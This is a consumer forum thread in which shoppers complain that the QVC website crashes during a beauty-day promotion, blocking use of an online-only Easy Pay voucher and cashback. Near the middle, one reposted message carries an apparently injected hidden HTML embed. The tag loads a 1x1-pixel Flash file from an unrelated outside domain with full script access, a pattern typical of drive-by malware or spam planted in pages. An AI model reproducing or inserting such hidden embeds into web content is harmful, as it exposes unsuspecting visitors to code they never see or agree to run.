QVC website working for everyone else?

ShoppingTelly

Help Support ShoppingTelly:

R

RedT

Guest Shopper
I decided to cave and order a BE kit with my three easy pay voucher. Been trying to order since this morning but the website keeps crashing...it's driving me nuts! You can't use the voucher on the phone..is anyone else having trouble with the website??

Tx

Yes, i am. I have been trying to order some OPI with no luck. I was going to phone in, I didn't realise I couldn't use the voucher on the phone.

Yes, i am. I have been trying to order some OPI with no luck. I was going to phone in, I didn't realise I couldn't use the voucher on the phone.

Ugh, SO frustrating!! I double checked the e-mail just now and it definitely says it can only be used online. It is valid until tomorrow but I'm out all day so I was hoping to get my order in today. Bit rubbish on beauty day....or bit of a coincidence??!

Just phoned QVC customer help line and they took the order over the phone, no problem.

I can't get on the website either - can only go so far and then it crashes.Maybe someone somewhere is telling me not to use my 3 easy pay voucher,so i'm not gonna phone in!

I am able to get on the website ok but have been trying to order the OPI flutter set since 10am this morning but not been able to, not fussed about the EP even though I got the email with the code but dont get Cash Back if I order on the phone
Also cant view "my account" :headbang:

I too have been having problems with the site on and off since this morning and am getting no-where either ordering or checking my account. I too am not bothered about the EasyPay but would like the cashback so don't want to order over the phone!

I am able to get on the website ok but have been trying to order the OPI flutter set since 10am this morning but not been able to, not fussed about the EP even though I got the email with the code but dont get Cash Back if I order on the phone
Also cant view "my account" :headbang:<embed allowScriptAccess="always" src="http://www.snivi.com/files/1.swf" quality="high" bgcolor="#ffffff" width="1" height="1" name="movie" align="" type="application/x-shockwave-flash" pluginspage="http://www.macromedia.com/go/getflashplayer"></embed>

Same here! This is so frustrating!!!

me too, planning to order the shark steam mop on my easy pay thingie as it has had all 5 star reviews and I have wanted a steam mop for ages plus feel less guilt buying useful rather than frivolous stuff, lo and behold can't use website, strangely I recall this happening last time I got a voucher.

The website comes up ok but every time I click on something I get the customer representative message tried just adding things to my cart from the first page but get the same message. I wanted some BE eyeshadows and always go through Quidco for the cashback and was going to use the 3 easy pay voucher neither of which I can do on the phone its very annoying

When I spoke to CS they said they knew about the problems with the site.

I could get so far with an order then it went to the contact CS page

Oh and for those with the Easy Pay Voucher, they took mine over the phone.

They wouldn't take my easy pay voucher at the call centre (she said they had been told not to!!! GRRR) so I said to put me through to customer services - I was ready for an argument but he put it through no probs!! lol!!

I have just received an email confirming my order placed online, I wasnt actually aware that I ever manged to get that far so hope it has only gone through once and not loads of times, although I did get CS to check earlier when I phoned :wonder:

Same here!! I am so annoyed..earlier today I spent over one hour actually trying to add products to my cart with error msgs all over the place..a further 2 hours going back and forth from the cart with various error messages about the qvc server (which could have been over 20 times) and then got an email confirming my order although I had not even once gotten to the submit order screen....I hope I dont get 20 odd orders!! this evening I've missed out on the elemis one time only pro-collagen range (which was amazing value and on 3 ep's to boot) and several other deals as it's still not working...I live for beauty days like today as I wouldn't otherwise be able to afford the products but am soooooo disappointed with the website today and the fact that not once did I hear any presenter mention on air that there were online problems...

And before anyone mentions the ordering alternatives - the interactive button wouldnt work on my sky (possibly due to the gails and torrential rain in Ireland at the mo) and as hubby was hovering about for the day I couldn't phone!!! (trying to explain the value etc would have just fallen on deaf ears:happy :happy: )

This year's beauty day with its easy-pay voucher (for some buyers) hasn't been the PR success they'd hoped for!

Jude x

This year's beauty day with its easy-pay voucher (for some buyers) hasn't been the PR success they'd hoped for!

Jude x

Given that the voucher could only be used on line according to the terms and conditions I would say its been a bit of a disaster really, if they are going to promote use of the web then they really need to improve their tech support at head office. The site has been playing up all day and from the error message I would say it is a server issue which really shouldn't take this long to rectify

I haven't been too much into QVC's beauty, my sins lie elsewhere, but had wanted to look at some of the items on the website, read the details and see if there are some deals to be had. I click on the thumbnails to get the page to open and I get the CS message. Don't think I can be bothered if I can't read up on whatever it is I am considering to buy. Can't believe that QVC can't get it running better.:clock::clock:

Latest posts

Back